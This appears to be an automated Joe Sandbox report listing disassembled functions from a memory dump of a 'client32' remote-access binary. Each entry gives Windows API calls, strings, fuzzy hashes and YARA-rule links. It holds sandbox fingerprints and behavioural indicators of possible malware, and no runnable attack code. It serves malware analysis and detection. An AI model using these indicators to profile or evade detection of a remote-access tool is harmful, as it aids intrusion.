                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 957642387-0
                                                                                                                                                                                                    • Opcode ID: 1bd055b6083121d80e33dfa5568883a4714f5ea254687d52776bfff21dfc5970
                                                                                                                                                                                                    • Instruction ID: 8ad631f96db838aeb177ad825b44802f5310a92a20880550bf7bb3694a76c840
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bd055b6083121d80e33dfa5568883a4714f5ea254687d52776bfff21dfc5970
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D119175544206DEEB106FB88A8C63CB7B07FA2718FD1482AF2647B180CF784481CB71
                                                                                                                                                                                                    Function 1103D330 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 319COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1103D3D1
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 1103D3DE
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 1103D0B0: Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                                                                                                      • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess$ErrorLastMessageSleep_memmove_memset_strrchrwsprintf
                                                                                                                                                                                                    • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$h+r$redirect:
                                                                                                                                                                                                    • API String ID: 118650250-2379608955
                                                                                                                                                                                                    • Opcode ID: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
                                                                                                                                                                                                    • Instruction ID: 8883845aa1adcb6b462271895c3eb4188d935db878da715d2f936e5278910226
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B1D234E0195A9FDB06DF98CC90FEDB3B5AF89309F448154E82567380EB34A908CBD1
                                                                                                                                                                                                    Function 1106D060 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,24DE4E77,?,?,?), ref: 1106D0E2
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 1106D2AA
                                                                                                                                                                                                    • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5
                                                                                                                                                                                                    • erased=%d, idata->dead=%d, xrefs: 1106D293
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterEventSection
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
                                                                                                                                                                                                    • API String ID: 2291802058-2272698802
                                                                                                                                                                                                    • Opcode ID: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
                                                                                                                                                                                                    • Instruction ID: b22ba82a88fbe9628385044aa67eb00d20c4b44079c4ac5070634ae5489f2a97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE71BC70E00286EFEB15CF64C884F9DBBF9AB04314F0481D9E44A9B291D770E9C5CB90
                                                                                                                                                                                                    Function 1101D550 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5C4
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5F4
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D618
                                                                                                                                                                                                    • GetBkColor.GDI32(?), ref: 1101D61E
                                                                                                                                                                                                    • GetTextColor.GDI32(?), ref: 1101D6A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InflateRect$Color$Text
                                                                                                                                                                                                    • String ID: VUUU$VUUU
                                                                                                                                                                                                    • API String ID: 1214208285-3149182767
                                                                                                                                                                                                    • Opcode ID: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
                                                                                                                                                                                                    • Instruction ID: 77e576ce41c6bbc1f275e9696d100ffe4c5213a4300096d6b7fb60596d00f56b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0617075E0021A9BCB04CFA8C881AAEF7F5FF98324F148629E415E7385D634FA05CB94
                                                                                                                                                                                                    Function 110B3590 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B3615
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B361F
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B363A
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 110B3689
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110B369E
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110B36ED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEvent$CriticalException@8InitializeSectionThrowVersionXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 3908453871-3788999226
                                                                                                                                                                                                    • Opcode ID: a19368b116d5de523ae4107eef672715f039439dabb1407ef6e56aff718b5f08
                                                                                                                                                                                                    • Instruction ID: 38b2c4dcff0dedf9a92b00eefd602a69c273a846f0a1c46fad91db0527ff3e0a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a19368b116d5de523ae4107eef672715f039439dabb1407ef6e56aff718b5f08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6514EB5D04705AFC714DF69C880AAAFBF8FB48704F50892EE55A97740EB74A904CBA0
                                                                                                                                                                                                    Function 11065430 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,24DE4E77,?,?,?), ref: 11065470
                                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 1106549A
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110654D3
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 110654F0
                                                                                                                                                                                                    • _free.LIBCMT ref: 11065578
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11065581
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms, xrefs: 1106554E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$DecrementEnterEventInterlockedLeaveTime_freetime
                                                                                                                                                                                                    • String ID: Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms
                                                                                                                                                                                                    • API String ID: 1154861362-2729525473
                                                                                                                                                                                                    • Opcode ID: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
                                                                                                                                                                                                    • Instruction ID: 3b3d7615ea4610ef5d080b5e58bc799fd5b460a4b46124fee3b0225fd41c603b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4418775A00A059FD715CF64C998BAAFBF9FB48348F00855DE82AC7254C731FA00CBA1
                                                                                                                                                                                                    Function 110310B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,24DE4E77,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
                                                                                                                                                                                                    • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                                                                                                                    • API String ID: 1613046405-2825297712
                                                                                                                                                                                                    • Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1
                                                                                                                                                                                                    Function 110273F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1102741E
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027448
                                                                                                                                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
